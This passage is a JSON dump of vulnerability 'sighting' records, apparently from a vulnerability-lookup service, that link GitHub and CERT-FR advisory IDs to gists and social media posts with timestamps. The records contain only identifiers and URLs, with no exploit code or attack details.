"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/1915b7b93f8ad1ca501373e767521f49", "content": "", "creation_timestamp": "2025-07-16T13:56:02.000000Z"}, {"uuid": "6c635b8a-6283-4b51-9d89-483837ae2c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/9f5a846ce0b6081e82b45bc9d54e8509", "content": "", "creation_timestamp": "2025-07-16T14:32:47.000000Z"}, {"uuid": "cf6ea9c7-d311-4b26-99ac-78e5fc784469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/775ec57ea2d52c4018fd2a48f2d948c6", "content": "", "creation_timestamp": "2025-07-16T06:50:00.000000Z"}, {"uuid": "9604a23f-2b5f-4fc7-b68e-fa5a7bb4968c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/775ec57ea2d52c4018fd2a48f2d948c6", "content": "", "creation_timestamp": "2025-07-16T06:50:00.000000Z"}, {"uuid": "e15cfc5c-19c2-410b-8c14-a728d71961c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/b9bce7a31afed89be9a68688fb74156c", "content": "", "creation_timestamp": "2025-07-16T13:57:42.000000Z"}, {"uuid": "4999ed89-ba69-41ea-aea0-0a3eb169b924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/b9bce7a31afed89be9a68688fb74156c", "content": "", "creation_timestamp": "2025-07-16T13:57:42.000000Z"}, {"uuid": "e61c1989-3258-455f-814d-c705216201ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/9f5a846ce0b6081e82b45bc9d54e8509", "content": "", "creation_timestamp": "2025-07-16T14:32:47.000000Z"}, {"uuid": "61afbfd1-d591-416d-9e8b-ea88f032232f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/9f5a846ce0b6081e82b45bc9d54e8509", "content": "", "creation_timestamp": "2025-07-16T14:32:47.000000Z"}, {"uuid": "27c6e418-6673-428c-b659-fe69db17d2d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmg8-593g-7mv3", "type": "seen", "source": "https://gist.github.com/safer-bot/9f5a846ce0b6081e82b45bc9d54e8509", "content": "", "creation_timestamp": "2025-07-16T14:32:47.000000Z"}, {"uuid": "39a071d7-f16d-49e1-b8e9-f5c36252f728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/d5ca115ca66735f27af739cec1454583", "content": "", "creation_timestamp": "2025-06-17T00:49:16.000000Z"}, {"uuid": "25dce2a4-807b-4bd4-96b0-dbbf3afddb43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "1eaa01f9-6a8f-412f-b50a-054e778ca50d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "aa3d8183-ef77-4e3a-bcd0-176d2d0573d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "3ae8aa14-4524-4bc1-aa25-6b458d22f1cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "4ed3ca1d-966d-4470-af75-d4bcaccabb0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "f92ad59e-e2b8-4d26-86eb-0ac64b41bc46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "237d8aa1-a263-49e4-b12e-75a8ad0d2d2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "77c89c4c-15a1-42df-9ed7-f5db441258e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "99c38b31-3e13-4f34-a2ea-eb79828e8ab9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "51f89cda-74ab-4a29-9d7b-d36732f8c372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/95fa9e363790e3d145320791b4d5b508", "content": "", "creation_timestamp": "2025-06-17T01:00:32.000000Z"}, {"uuid": "437c9bef-f4fa-44c3-a775-a580c512ac37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-026", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lsbkyfpb4524", "content": "", "creation_timestamp": "2025-06-23T12:20:29.031396Z"}, {"uuid": "cd9d79eb-ee07-4be7-9bff-561a9ce72ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "dd4651f3-8a6e-4bd4-8f7c-d8a72fb54604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/30f02cbaedc5abf4a02685db2603b3ee", "content": "", "creation_timestamp": "2025-07-16T09:40:04.000000Z"}, {"uuid": "04a83977-4075-451b-a04c-525fee3ddc44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/f76284df55f000581483f5063f777b7d", "content": "", "creation_timestamp": "2025-07-16T09:42:22.000000Z"}, {"uuid": "8b8e938c-edb2-4194-90c4-530bc92e7878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "49906c16-83b0-4140-9e1d-9eb4722ab6ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cj5w-8mjf-r5f8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114276478970363828", "content": "", "creation_timestamp": "2025-04-03T22:51:28.416197Z"}, {"uuid": "e59ed7f2-f428-41c0-8584-8ed12825ada6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cj5w-8mjf-r5f8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114276478970363828", "content": "", "creation_timestamp": "2025-04-03T22:51:28.422264Z"}, {"uuid": "a16486c2-d80b-4f6b-a05f-e94fcc7855f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "fb0b6a2d-40d8-4350-bddc-c0e2d8ee6e7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8vhq-qq4p-grq3", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "733713ee-5ef4-44ce-a29a-2cbbb657f044", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "a44904f7-c433-41a5-a479-e4aac197e31b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "641ecd41-fd79-49c4-bd83-25a7307597a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-008", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114630886878374339", "content": "", "creation_timestamp": "2025-06-05T13:02:06.771306Z"}, {"uuid": "963715b3-86cc-4345-9e77-024fdf768567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-003", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114278110029673028", "content": "", "creation_timestamp": "2025-04-04T05:46:19.768346Z"}, {"uuid": "adb59e76-1c1e-4224-a939-1c206adf9870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-003", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114278110029673028", "content": "", "creation_timestamp": "2025-04-04T05:46:19.781273Z"}, {"uuid": "8c61d423-e41e-490e-82f8-03339e981609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23fp-mrfv-cwv4", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114622172462843651", "content": "", "creation_timestamp": "2025-06-04T00:05:53.623370Z"}, {"uuid": "17eff8d2-376c-486b-ab69-f8b8db069352", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qc7j-jgf3-qmhg", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3ltrlg5kfi22r", "content": "", "creation_timestamp": "2025-07-12T14:35:57.736761Z"}, {"uuid": "b7470635-ce6b-4c7d-b127-f0c9946ed200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33xw-247w-6hmc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114280346981280788", "content": "", "creation_timestamp": "2025-04-04T15:15:09.269278Z"}, {"uuid": "a679edcc-1936-4b5e-9b86-0e9fe07c584a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33xw-247w-6hmc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114280346981280788", "content": "", "creation_timestamp": "2025-04-04T15:15:09.277772Z"}, {"uuid": "f9102597-fe25-498f-880c-b823f1300b92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/07f90bccf8ee58e3981ea9deaeae211c", "content": "", "creation_timestamp": "2025-07-16T06:00:32.000000Z"}, {"uuid": "35fd2739-d724-487e-95df-0e2559d39e5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/01c009a45b4602ca3dfaa56fc5ddca17", "content": "", "creation_timestamp": "2025-07-16T09:48:47.000000Z"}, {"uuid": "7a62b9ee-f927-4ec2-8d80-dfd6e38291dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/6815853942c03b02f019f646d770798a", "content": "", "creation_timestamp": "2025-07-16T11:46:20.000000Z"}, {"uuid": "aa5c80fa-e593-4be3-8323-ded9ff86a3fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "a6ce1a49-e78c-42f2-9abc-cf5e27bff58c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "da4bdfaf-bc61-4cf1-b613-9a1ad5b1bd7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "f6f066d8-0965-46aa-8632-63f8061a7ea0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/9bba59f11acbede980eca69fe6dd3220", "content": "", "creation_timestamp": "2025-07-16T13:01:38.000000Z"}, {"uuid": "348b399a-64f5-4e44-ac9f-1987ca394773", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/24445f286a41dd4629b0b14857278a6b", "content": "", "creation_timestamp": "2025-07-16T06:06:07.000000Z"}, {"uuid": "10b00eb8-ffb2-40d6-8c2b-477310214ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/24445f286a41dd4629b0b14857278a6b", "content": "", "creation_timestamp": "2025-07-16T06:06:07.000000Z"}, {"uuid": "6efa4ca5-8a87-464a-932c-0da5ce0b914f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j24h-xcpc-9jw8", "type": "seen", "source": "https://gist.github.com/safer-bot/01c009a45b4602ca3dfaa56fc5ddca17", "content": "", "creation_timestamp": "2025-07-16T09:48:47.000000Z"}, {"uuid": "1f8add44-ae58-4383-9cad-02ac943b1030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "602cba3c-4241-45e1-b682-327d52f9715e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "b6a29af1-8ea8-427b-bd32-205f85df907f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "71021551-ed63-451a-a08c-2ea53b8beaaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "e8448e06-8fad-44b1-88f1-d69c2621b6b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjv4-ghm7-q58q", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lti47xlfpg2z", "content": "", "creation_timestamp": "2025-07-08T20:10:06.969424Z"}, {"uuid": "d196e545-e00f-4cf3-98e9-b2f4075bf01d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vfp6-3v8g-vcmm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114694685602522986", "content": "", "creation_timestamp": "2025-06-16T19:26:55.207861Z"}, {"uuid": "fb9425ae-7785-4aed-be47-e0ae2e383cd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "a34f9f29-9124-4897-ba90-f4659b43616c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "ae5d7542-57ac-48a8-9269-b76619784c00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "823b987e-c74c-4596-8bfb-c0a4644181f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hfj8-63c8-rmfw", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "c8a6dc41-64b8-4d9f-9b7e-24a64a57f51f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "3744d89b-ce15-4d3b-b30e-31acf9e1ce4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p53j-g8pw-4w5f", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "9417e0b9-eba3-4d96-bf54-b38a5f74d096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "1b32a8cf-db71-4bab-97b5-8fb6a9ae9ac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73xv-w5gp-frxh", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "b2c28e10-1945-4791-b01d-e3c7a31f65f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "ecfd2566-62b0-491e-876b-657a4ab00331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fj2w-wfgv-mwq6", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "eb2544de-b0aa-4e2d-9231-506199d7df6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6xx3-rg99-gc3p", "type": "seen", "source": "https://gist.github.com/safer-bot/57636fb56c908ea716ca50f36824e43c", "content": "", "creation_timestamp": "2025-07-16T09:49:54.000000Z"}, {"uuid": "ae4a2599-5c74-47a1-ba1e-900b4286c84e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-014", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lm7wd2lea52r", "content": "", "creation_timestamp": "2025-04-07T12:06:48.452714Z"}, {"uuid": "045f9c49-f36b-43d3-b9f1-9f58218cb8a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-014", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114296593272887332", "content": "", "creation_timestamp": "2025-04-07T12:06:49.470121Z"}, {"uuid": "ff4e24bb-392e-4ab3-8297-c0de33faa52f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-014", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lma6ps5y2q2r", "content": "", "creation_timestamp": "2025-04-07T14:37:06.076155Z"}, {"uuid": "e7edd03a-6c37-46ad-9acc-3114aa8f6711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "4fbaac04-45b9-435e-8c8f-8f5ddf235eb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": "2025-07-16T06:05:35.000000Z"}, {"uuid": "290a3bd6-8f16-4b14-ba02-7c39bc8346ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/678e0ba18d8f78e6a69974ba13c63b56", "content": "", "creation_timestamp": 